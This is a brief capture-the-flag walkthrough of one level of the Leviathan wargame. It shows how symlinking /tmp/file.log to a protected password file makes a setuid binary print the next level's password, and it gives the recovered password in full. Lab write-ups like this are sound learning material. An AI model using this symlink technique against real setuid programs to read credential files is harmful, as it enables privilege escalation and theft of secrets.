A lesson in symlinks is long overdue. In Leviathan 6, we will exploit a binary by using a symbolic link at a path we have permission to write. When we run the binary in Leviathan5's home directory, it appears to be attempting to read from a file in /tmp. The binary is owned by Leviathan6, has the setuid bit set (the `s` in the listing below), and belongs to Leviathan5's group, so we can execute it and it runs with Leviathan6's privileges. Therefore, it can read Leviathan6's password.
leviathan5@melinda:~$ ls -la
-r-sr-x--- 1 leviathan6 leviathan5 7501 Jun 6 13:59 leviathan5

# Try to run the binary
leviathan5@melinda:~$ ./leviathan5
/tmp/file.log: No such file or directory

# Since we need Leviathan 6's pass, symlink that to the log we create within the same command:
leviathan5@melinda:~$ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log

# Now run the binary, which apparently reads whatever is in /tmp/file.log
leviathan5@melinda:~$ ./leviathan5
UgaoFee4li
We successfully exploited badly placed file permissions via symlinking and now have Leviathan6's password as a result. Believe it or not, these types of issues still exist in the real world.